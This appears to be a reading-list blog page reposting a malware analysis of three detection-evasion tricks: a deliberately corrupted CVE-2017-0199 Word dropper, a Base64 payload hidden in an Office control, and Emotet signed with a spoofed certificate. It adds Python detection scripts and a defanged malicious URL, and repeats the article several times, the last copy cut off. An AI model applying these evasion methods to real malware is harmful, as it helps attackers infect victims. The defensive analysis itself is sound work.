About The Reading List

To keep current on threats and what they mean to businesses, I read a lot of sources every day. So I had the idea: why not share our reading list with everyone? This page is dedicated to the never-ending collection of articles that I think are important.

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection


The experts at Yoroi-Cybaze ZLab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analyses we constantly run into the tricks cyber-attackers use to bypass companies' security defences, some advanced, others not. Despite their elegance (or lack of it), these techniques are often effective and actually help cyber-criminals get into victims' computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payloads and lure users. The third concerns binary payloads that abuse code-signature tricks to evade traditional security controls.

The Broken Doc

Sha256: e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat: CVE-2017-0199 document
Brief description: Document dropper exploiting CVE-2017-0199
Ssdeep: 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92cSCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file, so that the malicious payload is downloaded without the user noticing any suspicious alert. As a case study we chose a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code when it is opened. The following figure shows the external reference to the remote code that will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, opening a weaponized document such as this one will likely alert a trained, aware user: an unusual popup window warns that the document contains a “link” referring to external files.

Figure 2. Suspicious popup window

This message may look suspicious to the victim, who could then delete the document and avoid the infection. But through the trick we observed, the user warning can be bypassed. The sample contains a careful corruption of the document itself: some bytes have been deleted by the attacker without affecting the behaviour of the exploit.

Figure 3. Corrupted document

Once the user opens the crafted file, MS Word displays a different popup message: it now reports that the document is corrupted and asks for confirmation to restore it. This is an entirely different message from the previous one, and it lets the victim think the document is merely broken.

Figure 4. Popup window reporting the impossibility of opening the document

After the user clicks “Yes”, MS Word automatically restores the file content and the exploit runs, downloading and executing further payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components that are often not visible to end users. In most Office installations the Developer tab is in fact disabled by default, which makes it even harder to identify the presence of anomalous objects.

This technique was also employed in a sample we analyzed some time ago. When opened, the document looks like many others.

Figure 5. Classic phishing document view

However, analysis of the macro code reveals that the real payload is stored elsewhere, specifically in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box right after the macro code is enabled (Figure 7).

Figure 7. Document’s modified view

Without enabling Word's Developer mode in the appropriate Options menu, it is impossible to select the object and inspect its properties. After enabling it, we were able to explore the object's content: the Base64-encoded payload.

Figure 8. Extracted payload

With this strategy, the malware author moves the identifiable payload into a location that is harder to inspect, both for automated and for manual analysis, obtaining a lower detection rate during static analysis.
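A static triage check for the two document tricks above, written here as an added example and not taken from the original analysis. It assumes the OOXML (.docx) container rather than the legacy binary format the sampled documents may have used, and the heuristics are this example's own: any relationship whose TargetMode is "External" (the way an OLE link to a remote file is expressed in the package, as in the CVE-2017-0199 case) is reported, as is any long, well-formed Base64 run in an XML part, wherever the author parked it (a text box, a control, a field). A container that cannot be parsed is reported too, since that is what a deliberately damaged file that Word offers to "repair" looks like. The document it scans is constructed in memory by `build_sample_docx`; `scan_ooxml`, `SAMPLE_PAYLOAD_B64` and `PLACEHOLDER_TARGET` are names chosen for this example.

```python
import base64
import io
import re
import zipfile

# A long unbroken run of Base64 alphabet inside an XML part is a cheap indicator
# of an embedded payload, regardless of which element holds it.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
# Package relationships that point outside the document (TargetMode="External");
# an OLE link to a remote payload is expressed this way in OOXML.
EXTERNAL_REL = re.compile(rb'<Relationship\b[^>]*TargetMode="External"[^>]*/?>')
ATTR = {k: re.compile(k.encode() + rb'="([^"]*)"') for k in ("Type", "Target")}

# Constructed values for the demo: not taken from any real sample.
SAMPLE_PAYLOAD_B64 = base64.b64encode(b"constructed payload " * 20)
PLACEHOLDER_TARGET = "http://placeholder.invalid/stage2.doc"  # placeholder URL


def scan_ooxml(blob: bytes) -> list:
    """Static triage of an OOXML package; returns a list of finding dicts."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        # An unreadable container deserves a manual look, not a silent pass.
        return [{"kind": "corrupt-container", "part": None,
                 "detail": "not a readable OOXML zip"}]
    findings = []
    with zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            data = zf.read(name)
            if name.endswith(".rels"):
                for rel in EXTERNAL_REL.finditer(data):
                    tag = rel.group(0)
                    rtype = ATTR["Type"].search(tag)
                    target = ATTR["Target"].search(tag)
                    findings.append({
                        "kind": "external-relationship", "part": name,
                        "detail": "%s -> %s" % (
                            rtype.group(1).decode() if rtype else "?",
                            target.group(1).decode() if target else "?")})
            for m in B64_RUN.finditer(data):
                try:
                    decoded = base64.b64decode(m.group(0), validate=True)
                except ValueError:
                    continue  # alphabet run that is not well-formed Base64
                findings.append({"kind": "base64-blob", "part": name,
                                 "detail": f"{len(decoded)} decoded bytes"})
    return findings


def build_sample_docx(payload_b64: bytes, external_target) -> bytes:
    """Construct a minimal OOXML package: a visible lure sentence, a 1pt text box
    holding payload_b64, and optionally an external oleObject relationship.
    This is a constructed sample, not a real document."""
    doc = (b'<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           b'<w:body><w:p><w:r><w:t>Invoice attached.</w:t></w:r></w:p>'
           b'<w:p><w:r><w:pict><v:shape xmlns:v="urn:schemas-microsoft-com:vml" style="width:1pt;height:1pt">'
           b'<v:textbox><w:txbxContent><w:p><w:r><w:t>' + payload_b64 + b'</w:t></w:r></w:p>'
           b'</w:txbxContent></v:textbox></v:shape></w:pict></w:r></w:p></w:body></w:document>')
    rels = b'<?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    if external_target:
        rels += (b'<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                 b'Target="' + external_target.encode() + b'" TargetMode="External"/>')
    rels += b'</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", doc)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_ooxml(build_sample_docx(SAMPLE_PAYLOAD_B64, PLACEHOLDER_TARGET)):
        print(finding)
```

The point of scanning raw XML parts rather than the rendered text is that a Base64 blob inside a 1pt text box or a developer control is invisible in Word but is plain text in the package; a renderer-based check would miss exactly what this section describes. Lower the 200-character threshold to trade false positives for recall, and treat a corrupt container as a reason to look closer rather than as a parse failure to discard.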

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is “certificate spoofing”, which allows malware to easily bypass a considerable portion of anti-virus engines, even those employing identification techniques theoretically able to detect encrypted and packed threats. Attackers can also obtain a valid certificate for their malware by stealing cryptographic keys from legitimate owners or by leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection requires less effort: even an invalid certificate is enough to achieve the goal, as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques, an attacker may sign an arbitrary executable with an arbitrary certificate taken from any website. As a case study, we reproduced this technique by signing a known Emotet binary with the Symantec website certificate.

Sha256: ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat: Emotet
Brief description: Emotet payload
Ssdeep: 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256: a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat: Emotet
Brief description: Emotet payload signed using the Symantec certificate
Ssdeep: 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility, the file signature is invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick decreased the VirusTotal detection rate from 36 to 20. Even Symantec AV did not detect the sample as malicious!

To be fair, as Chronicle Security states, VirusTotal is not a “comparative metric between different antivirus products”, so this result does not imply anything about the overall quality of antivirus solutions. Conservatively, it provides a clue about one inner detection mechanism, showing how attackers bypass some identification logic, not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff between the two samples confirms that adding the certificate does not alter the functional parts of the malware in any way and, therefore, does not change its behaviour.

Figure 13. Comparison between samples without and with fake certificate at hex level
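The comparison in this section can be reproduced on the defender's side with a few lines of header parsing. The following is an added example, not code from the original analysis: it locates the attribute certificate table through the PE security data directory (the one directory entry that stores a raw file offset rather than an RVA), reports whether a certificate table is present, and hashes the two samples with that table and the two header fields a signing tool rewrites removed, which is why the hex-level diff in Figure 13 shows no functional change. The PE image it runs on is constructed inline by `build_minimal_pe`; that helper and the other function names are this example's own.

```python
import hashlib
import struct

SECURITY_DIR_INDEX = 4   # IMAGE_DIRECTORY_ENTRY_SECURITY in the optional header
CHECKSUM_OFFSET = 64     # CheckSum field offset inside the optional header (PE32 and PE32+)


def _locate(pe: bytes):
    """Return (optional_header_offset, security_dir_entry_offset) for a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file: missing PE signature")
    opt_hdr = e_lfanew + 4 + 20                 # skip signature and COFF file header
    magic = struct.unpack_from("<H", pe, opt_hdr)[0]
    if magic == 0x10B:                          # PE32: data directories start at +96
        data_dir = opt_hdr + 96
    elif magic == 0x20B:                        # PE32+: data directories start at +112
        data_dir = opt_hdr + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return opt_hdr, data_dir + 8 * SECURITY_DIR_INDEX


def certificate_table(pe: bytes):
    """(file_offset, size) of the attribute certificate table, or (0, 0) if none.
    Unlike every other data directory, this entry holds a raw file offset."""
    _, entry = _locate(pe)
    return struct.unpack_from("<II", pe, entry)


def strip_certificate_table(pe: bytes) -> bytes:
    """Drop the appended certificate table plus the two header fields a signing
    tool rewrites (security directory entry and CheckSum), leaving the bytes
    that actually execute."""
    opt_hdr, entry = _locate(pe)
    off, size = struct.unpack_from("<II", pe, entry)
    out = bytearray(pe)
    struct.pack_into("<I", out, opt_hdr + CHECKSUM_OFFSET, 0)
    if off and size:
        if off + size > len(pe):
            raise ValueError("certificate table runs past end of file")
        struct.pack_into("<II", out, entry, 0, 0)
        del out[off:off + size]
    return bytes(out)


def functional_digest(pe: bytes) -> str:
    """SHA-256 of the executable bytes with signature-related data removed."""
    return hashlib.sha256(strip_certificate_table(pe)).hexdigest()


def same_functional_bytes(a: bytes, b: bytes) -> bool:
    return functional_digest(a) == functional_digest(b)


def build_minimal_pe(cert_blob: bytes = b"") -> bytes:
    """Construct a tiny, non-runnable PE32 image for demonstration: DOS header,
    PE signature, COFF header with zero sections, 224-byte PE32 optional header.
    If cert_blob is given, a WIN_CERTIFICATE table wrapping it is appended and
    the security directory entry is pointed at it. Constructed, not a real binary."""
    e_lfanew = 0x40
    image = bytearray(e_lfanew)
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image += b"PE\x00\x00"
    # Machine=i386, 0 sections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader=224, Characteristics
    image += struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    image += opt
    if cert_blob:
        # WIN_CERTIFICATE header: dwLength, wRevision=0x0200, wCertificateType=2 (PKCS#7)
        table = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
        _, entry = _locate(bytes(image))
        struct.pack_into("<II", image, entry, len(image), len(table))
        image += table
    return bytes(image)


if __name__ == "__main__":
    plain = build_minimal_pe()
    signed = build_minimal_pe(b"constructed-certificate-bytes")
    print("certificate table:", certificate_table(signed))
    print("functionally identical:", same_functional_bytes(plain, signed))
```

Two practical consequences follow from this check. First, a certificate table whose signature does not verify (the SignTool result in Figure 11) is a stronger triage signal than no signature at all: a legitimate publisher has no reason to ship a broken signature. Second, pairing a sample's full hash with its `functional_digest` lets a clustering or YARA-style pipeline recognise the signed and unsigned Emotet variants as the same code, so that an appended blob cannot split one family into two.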

Conclusion

The techniques shown here are only a few of the countless tricks implemented by threat actors to make detection harder. We constantly observe attack attempts using these kinds of tricks, and we are still surprised at how often, even today, they decrease the detection rate, even though the tricks are well known.

We hope that a direct spotlight on a few of these tricks will push the eternal cat-and-mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for the attackers who threaten users and companies.

Further technical details, including IoCs and Yara rules, are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

